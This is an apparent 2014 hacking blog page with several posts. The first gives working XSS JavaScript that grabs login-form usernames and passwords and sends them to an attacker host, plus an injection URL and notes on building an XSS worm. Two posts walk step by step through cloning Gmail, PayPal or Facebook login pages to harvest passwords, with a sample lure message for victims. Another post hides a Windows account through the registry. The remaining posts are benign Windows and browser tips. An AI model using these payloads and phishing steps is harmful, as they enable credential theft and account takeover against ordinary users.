Wednesday, 26 March 2014

Xss Phishing (Make phishing as ur Passion)

Hi there,
func_resizer.php
There have constant reporting for phishing so tried to get a cool hack for you guys,
as these hacks are becoming more and more famous day by day,
the vulnerabilities are growing and so the hackers activates,
but we first start with XSS.

XSS are certainly changing the away that Phishing attacks are perpetrated.

for example we have a target as :-
http://Thewebsite.com/google/add.php?request=

Suppose, there is a login form and a XSS vulnerability in the 
same page. 
In order to perpetrate the phishing attack one need to inject JavaScript code in the 
variable to make that the victim’s browser load a JavaScript file. 
From a brief analyses at the HTML that the site generates I know that :
• The value that the variable “request” receives is not sanitized at all.

• The login form is named “login_clientes”

• The login form have two input fields for user data: “user” and “pass”.
So I will use the following JavaScript code:

loginForm = document.forms['login_clientes'];       
function parseData()        
{        
var username = loginForm.user.value;        
var password = loginForm.pass.value;        
saveData(username,password);        
return true;        
}        
function saveData(username,password)        
{        
var frame=document.createElement('iframe');        
frame.src="http://myhost/myparsefile.php?username=" + username + "&password=" +       
password;        
frame.style.display='none';        
document.body.appendChild(frame);        
}        
loginForm.onsubmit = parseData;

Idea !


So, if browsing a page like (don’t forget to encode the part of the injection): 
http://Thewebsite.com/google/add.php?request=<script type="text/javascript" language="JavaScript" 
src="http://yourhost/yourJavaScriptfile.js"></script> 
A victim will give you his personal data, as long as he clicks the Submit button. 
The ideas that you must have in mind are:


• If you can make the user browser load your JavaScript file or code when visiting 
some site, you can change that site behavior.

• If some site has forms and XSS vulnerabilities you can try to get the user 
inputted data.

• If the user trust the site, the user will, probably, give his personal data 
anywhere in that site.

And if the site has vulnerabilities in some page where it doesn’t have forms, and have 
some form(s) in other page(s)? 

Conclusion



Try coding some JavaScript that opens, in a full-sized frame, the page that has the login 
form. If you can reach the form inside that frame via JavaScript, the job is done, else 
store a copy of the html that the login page outputs and, instead of load in a frame the 
real login page, load your copy, which you control. As the address bar won’t change, 
the user trust on the site won’t, probably, change too. 
What more can you do with XSS vulnerabilities?

 
• In forums, or other type of community sites you can “spread the word”: 
If you can send a private message, and you know that the browser of the user 
that reads it will parse your JavaScript, you can make a specially crafted 
message that, when read, shows, to the victim, the page with the login form, 
and, without the victim knows, send to other folk a copy of itself. Your personal 
worm.


• As above but, instead of send a private message, you can try to change the user 
profile data and fill it with more injections.


• “Misplaced” JavaScript code is more likely to be parsed by Internet Explorer 
that by Mozilla Firefox. Both Internet Explorer versions 6.x and 7.x parse 
JavaScript code written in a “.txt” file, what can be useful in a real world 
situation like making a post in some forum that let you attach “.txt” files, a 
more likely situation than one where you can attach an “.html” file. Internet 
Explorer version 6.x parse JavaScript code given as the “src” of some image. 
Example: <img src=”javascript:your_code”>

_Hacker__by_DEVlANT

Happy Hacking 

How To Create Your Own Phisher

How To Create Your Own Phisher
Phisher page is the login page same as of the service your victim is using for example -->gmail,orkut,yahoomail,paypal,facebook,twitter etc.
It will Look Just as same as you are asked to login to your Email acount,Thats where the victim gets tricked aka HACKED.

So,Lets start.
To create Your Own Phisher you have to follow these simple steps ----

1. You have to go to the website for which you want to make your phisher for ex.gmail,yahoomail,orkut,paypal etc


2. When you are there at the login page just click on File>Save As
[ remember to rename it as index.html while saving the web page ]


3. When you have saved the web page,open theindex.html in notepad. 

4. Search for .gif and replace the text written before the image name with


You Have To Do that for all the images named there, Or you can use replace all option. 

5.There will be another file needed also named as login.php .Which will give the condition to save the username and password typed by the user. 

[NOTE:- I will not be providing the login.php to you,You have to get the login.php by yourself.
if you have some knowledge about the php language you can make your own login.php
For those who dont have knowledge about php language i recommend you search for login.php on Google,you will surely get that file.] 

6. After you have done this,click on Edit>Search and type action in the search box,and then click on search. 

7. It will take you to the First action String, after the equals two mark type login.php in replace of the the text written after it. 

8. Click on Seach again,this time it will take you to another action string,after the equal to mark type
in replace of the text written in front of
the equals to mark.
NOTE: You have to type you your sites name in replace of your-site,and your free webhosting service against yourservice in 
http://www.your-site.yourservice.com/login.php. 

9. Now you are all done. 

NOTE: You have to upload all the files on your free webhosting service directory,including in index_files Folder in the directory.Or it wount work.
The Directory Will be ---
i. index.html
ii. index_files [Folder which you saved]
iii. login.php
iv. login.txt 

10. You can Make any websites phisher by these steps for example -- gmail,orkut,yahoomail,paypal,facebook,twitter etc. 

Happy Hacking 

How To Hack Any Email Account (WORKING)

So lets start with some of basics,
This has become a very common way to hack any email account, It is also known asPhishing attack  in the language of the hackers.

Yes,This is the very famous 
 phishing attack. This is the most concerned security threat prevailing in the society 
As the target of this kind of attack are the social people. 


There are two types of phishing attack :-

1.Normal Phishing.
2.Desktop Phishing.

The basic idea behind the phishing attack is to make victim fool by rediecting him to a website same as original site,while saving his password,

which he thinks is login in to his account and gets hacked. 




Ok,so basics must be clear now LET'S START. 

To Hack Any Email ID you have just follow the following simple steps, 


1. Firstly , You have to create you website or to have a account on any Free webhosting service which have php enabled service.

[For most of the newbies,i would recommend you to register for a free webhosting service such aswww.110mb.com or any free webhosting service
that comes with php enabled in it.But 110mb is best because of its user friendly service they provide] 



2. After you have setup your account on any free webhosting service,you have to upload your phisher on to the the file directory of your site. 


3. For that you have to make your own phishing page which is discused on this webpage -

Click Here To view how to make your own phisher 


[Phisher page will be the login page same as of the Email service your victim is using for example :-Gmail,orkut,yahoomail, pay pal etc.
It will Look Just as same as you are asked to login to your Email acount,Thats where the victim gets tricked aka 
HACKED] 

4. There will be another file needed also named as "login.php" .Which will give the condition to save the username and password typed by the user.

[NOTE:- I will not be providing the login.php to you,You have to get the login.php by yourself.
if you have some knowledge about the php language you can make your own login.php
For those who dont have knowledge about php language i recommend you search for
login.php on Google,you will surely get that file.]
 


5. So,After you have created you phisher it is time to edit them,so as to make them save the username and password typed by the victim.

Here are the simple steps to edit the phisher :-


i. Open your phisher in a web browser,Right click in Somewhere in middle of the web browser and then click on View Source.


ii. A new windows will pop up,click on Edit>Search and type action in the search box,and then click on search.


iii. It will take you to the First action String, after the equals two mark type login.php in replace of the the text written after it.


iv. Click on Seach again,this time it will take you to another action string,after the equal to mark type http://www.your-site.yourservice.com/login.php in replace of the text written in front of the equals to mark.


NOTE: you have to type you your sites name in replace of your-site,and your free webhosting service against yourservice in http://www.your-site.yourservice.com/login.php.written over in step iv. 

6. So, Now you have done the difficult part it is time for some HACKING.

NOTE: You have to upload all the files on your free webhosting service directory,including in index_files Folder in the directory.Or it wount work.
The Directory Will be :-


i. index.html
ii. index_files [Folder which you saved]
iii. login.php
iv. login.txt




7. Now you have to just send the victim to your phisher site http://www.your-site.yourservice.com/ 



You can send him the message to visit your phisher for example :-

Hi,
How is it going.
You know what, i visited a site yesterday it is a new look of [Victims Email Service].
just check out.
its http://www.your-site.yourservice.com/
Its really good.
bye.
You can make your own message and send it to victim. 


9. To view the saved password you have to just logon to your free webhisting service account and open login.txt to view the saved password. 


10. And you are done,In just ten steps you have leaned the phishing attack. 


I would be discusing the desktop phishing in some other articles. 


Happy Hacking
Greetz to all...
 

How To Manage Multiple Gmail Accounts In ur FireFox Browser

Do you love Gmail, Don't know about you guys about but i am a big fan of Google Products. When i am online i need more than one email account for my ease and its really helpful because i don't have to worry about my accounts Security .
I know what you guys would say, “its pretty hard to remember my Accounts Username and passwords”
 
But again if i use multiple accounts and i remember each and everything. 
But that's not with you guys and that's why i have written this blog article.
Now i introduce you to my Tool which helps me a lot to run various Email Accounts together. 

Well there are many tools on the internet
Lets Start :-

Gmail Manager 0.5.7.5

The original Gmail Notifier for multiple accounts.
Allows you to receive new mail notifications along with viewing account details including unread messages, saved drafts, spam messages, labels with new mail, space used, and new mail snippets.

Further Reference

1. Well you can also Find more Firefox Add-ons for managing multiple Gmail AccountsHERE
2. Do you use multiple Google products then use this Firefox Add-on HERE

How To Create A Invisible Account In Windows XP

Ok, A really Quick tutorial on for windows XP on How To Create A Invisible Account In Windows Xp. What we have do in this hack is really simple just create a DWORD valuein the windows registry and hack the windows user accounts .


Ok so are you sure you want to learn this hack then read ahead,

Steps :-


1. Open Start menu then click on RUN.
2. Type in the Run Window Regedit 
3. Windows Registry editor will open then navigate from the left panel :

HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList
4. Create a new DWORD, setting its name to the name of the account you wish to hide.
5. Then set its value to to hide it.
6. Enjoy its Hidden !!

NOTE : This account isn't completely hidden because it is visible to administrators inLocal User and Groups and also the profile is visible in the Documents and Settings.
 
Now How To Login In it after you have hidden the account :


1. At Welcome screen, and you want to login to this account.
2. Press Ctrl+Alt+Delete twice and it will display the log-on promt.
3. Type the username, and the password and hit enter.


enjoy...

lile our new page hackersworld in fb.

Windows 7 God Mode Hack [Tutorial]

Windows 7 The New shiny product of Microsoft is just revealed and some windows guys have uncovered a new Hack in Windows 7 which the team at windows call is "GodMode"

The Hack is some kind of Glitch as we have also seen the Glitch in YouTube yesterday, What this does is bring you to an new settings page which got some good options in it to play with the windows.

Windows 7 GodMode Hack [Turtorial]

Obviously not the control panel settings, they contain some of the good one's in them like"Back up Your computer" and "Login Credentials" and stuff like that.

The "GodMode" Contains a List of Over 50 sections consisting of setting for you which can be enabled by a simple rename.  But it might be a new promotion by the windows guys to promote their New windows 7...

Whatever, lets focus on the Trick that we are going to apply to enable the, so called "GodMode" in windows 7.

Steps

The Hack is very easy one, with a simple rename you can access it. So don't blame me if this is Lame.
  1. Create a new folder.
  2. Rename the folder to
    234-windows-godmode-iconGodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
    (note that you can change the “GodMode” text, but the following period and code number are essential).
  3. The folder icon will change — double click it to show the GodModewindow:

ScreenShot


Windows_7_godmode_610x404

234-windows-godmode-window

Conclusion

This might be good for you as you can now apply various setting to your Windows 7 at a single place. btw i don't use Windows 7 that much, i just Love the Window Xp. It might a new promotional way by the Microsoft guys. well who cares.

- Enjoy


Top Ten Hacking Sites

Hi,
As i said i am back with more stuff for you guys,
Hope you all enjoy them,
So i am here to tell you guys world top 10 websites for hackers,
Which every hacker should know about,
So lets start,



1. Milw0rm

i have given this website the first rank because it is the major place for all milw0rm-wi
security guys,and penetration testers and the major of us hackers..


2. Hack a day
Second comes this, 
its great for hackers to have a community like this
                                      ,hackaday-logo

with compitions,and stuff

3. Security Focus
These guys are great in terms of security testing,

4.ASTALAVISTA - secuirt y & hacking community
Another great place like Top milw0rm…

5.PacketStorm Security
Name tells it all :)

6.Black Hat

7.Metasploit Project

8.Insecure.org: Top 75 Security tools

9.2600 Store

The Birth Of hacking Is here …..

10.Rootkit

Hope you get that,
These where the place you must visit,
Happy Hacking